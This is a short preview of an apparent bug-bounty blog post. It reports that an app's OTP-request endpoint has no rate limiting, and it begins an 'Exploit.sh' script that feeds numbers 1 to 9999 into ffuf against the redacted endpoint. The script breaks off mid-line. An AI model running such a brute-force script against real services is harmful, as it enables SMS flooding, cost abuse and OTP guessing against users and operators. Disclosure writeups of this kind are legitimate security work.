Android No Rate Limiting Leads to Mass SMS Brute-Force
Endpoint Requesting an otp but problem is there is no rate limiting. We can request unlimited otp’s.
I crafted A ffuf Request to make it fast and easier
Exploit.sh
#! /bin/bash
seq 1 9999 | ffuf -u https://sub.redacted.com/api/v2/otp \
-H 'accessTo...
thesecurityguy.hashnode.dev1 min read